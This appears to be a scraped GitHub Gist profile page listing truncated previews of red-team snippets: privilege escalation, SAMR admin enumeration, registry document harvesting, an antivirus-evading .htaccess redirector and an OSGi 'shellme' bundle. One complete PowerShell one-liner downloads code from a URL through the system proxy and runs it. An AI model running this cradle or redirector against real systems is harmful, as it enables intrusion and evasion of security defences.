Skip to content

Instantly share code, notes, and snippets.


Steve Borosh rvrsh3ll

View GitHub Profile
View proxybypass.txt
powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))"
View Get-RecentDocs.ps1
function Get-RecentDocs {
Pulls names of recently opened documents from registry
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
View cpl.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class Test
rvrsh3ll /
Created Sep 3, 2017 — forked from ropnop/
Python script using Impacket to enumerate local administrators over SAMR
#!/usr/bin/env python
# Title:
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See:
# Heavily based on original Impacket example scripts written by @agsolino and available here:
View Mine-MostProfitableGeneric.ps1
function Mine-MostProfitableCoin {
# Modify to your appropriate miner's locations
$ElectroneumMiner = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\ccminer-x64-2.2.2-cuda9\ccminer-x64.exe"
$MoneroMiner = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\ccminer-x64-2.2.2-cuda9\ccminer-x64.exe"
$BitCoinGoldMiner = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\ccminer-x64-2.2.2-cuda9\ccminer-x64.exe"
$MonaCoin = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\xmr-stak-monero\xmr-stak.exe"
# Modify to your public wallet's addresse's
rvrsh3ll / .htaccess
Created Apr 23, 2018 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
View .htaccess
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here:
RewriteCond expr "-R ''" [OR]
RewriteCond expr "-R ''" [OR]
rvrsh3ll /
Created May 27, 2018 — forked from xdavidhu/, a bash script to convert domain lists to resolved IP lists without duplicates
# by @xdavidhu
# This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix
# With this script, you can convert domain lists to resolved IP lists without duplicates.
# Usage: ./ [domain-list-file] [output-file]
echo -e "[+] by @xdavidhu\n"
if [ -z "$1" ] || [ -z "$2" ]; then
echo "[!] Usage: ./ [domain-list-file] [output-file]"
exit 1
package com.rvrsh3ll.osgi.shellme;
import org.osgi.framework.BundleActivator;
import org.osgi.framework.BundleContext;
public class Activator implements BundleActivator {
public void start(BundleContext context) throws Exception {
public void stop(BundleContext context) throws Exception {
View CompileBundle.txt
javac -d ../classes/ -cp ../lib/felix.jar com/rvrsh3ll/osgi/shellme/
jar -cmf MANIFEST.MF rvrsh3ll.jar -C ../classes com
View Powerup.ps1
PowerUp aims to be a clearinghouse of common Windows privilege escalation
vectors that rely on misconfigurations. See for more information.
Author: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None